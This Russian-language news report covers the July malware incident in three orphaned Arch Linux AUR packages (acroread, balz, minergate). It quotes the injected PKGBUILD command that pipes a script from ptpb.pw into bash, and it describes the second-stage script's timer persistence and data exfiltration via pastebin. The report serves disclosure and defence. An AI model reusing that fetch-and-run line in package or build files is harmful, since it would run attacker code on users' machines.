В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах
acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.
7 июля в пакеты были внесены изменения, в результате которых
в файл PKGBUILD был добавлен код «curl -s https://ptpb.pw/~x|bash -» вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта «https://ptpb.pw/~u», устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.
Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.
Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.
Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).